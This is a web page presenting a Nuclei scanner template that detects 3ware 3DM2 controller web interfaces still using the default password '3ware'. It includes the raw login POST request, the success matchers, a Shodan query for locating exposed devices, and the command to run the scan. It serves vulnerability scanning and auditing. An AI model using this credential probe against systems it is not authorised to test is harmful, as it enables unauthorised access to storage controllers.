3ware Controller 3DM2 - Default Login

ID: 3ware-default-login

Severity: high

Author: ritikchaddha

Tags: default-login,3ware,3dm2

Description

The default password for logging in to the 3DM2 web interface of a 3ware controller is “3ware” for both the Administrator and User accounts.

YAML Source

id: 3ware-default-login

info:
  name: 3ware Controller 3DM2 - Default Login
  author: ritikchaddha
  severity: high
  description: |
    The default password for logging in to the 3DM2 web interface of a 3ware controller is "3ware" for both the Administrator and User accounts.
  reference:
    - https://www.thomas-krenn.com/en/wiki/3ware_Controller_3DM2_Password
  metadata:
    max-request: 1
    shodan-query: title:"3ware"
  tags: default-login,3ware,3dm2

http:
  - raw:
      - |
        POST /login.html HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        whopwd={{username}}&thepwd={{password}}

    attack: pitchfork
    payloads:
      username:
        - a
      password:
        - 3ware

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'now logged in'

      - type: word
        part: set_cookie
        words:
          - 'TDMUSER='

      - type: status
        status:
          - 200
# digest: 490a004630440220597deef08e589933c8a2bf3641550b7b8cf9f1a0906b4176185d9166e82a690502201de0a41dd66c1dd50dbdce548dd6cc214f17323776a26be3acd36fa91b78f5e4:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/default-logins/3ware-default-login.yaml"

View on Github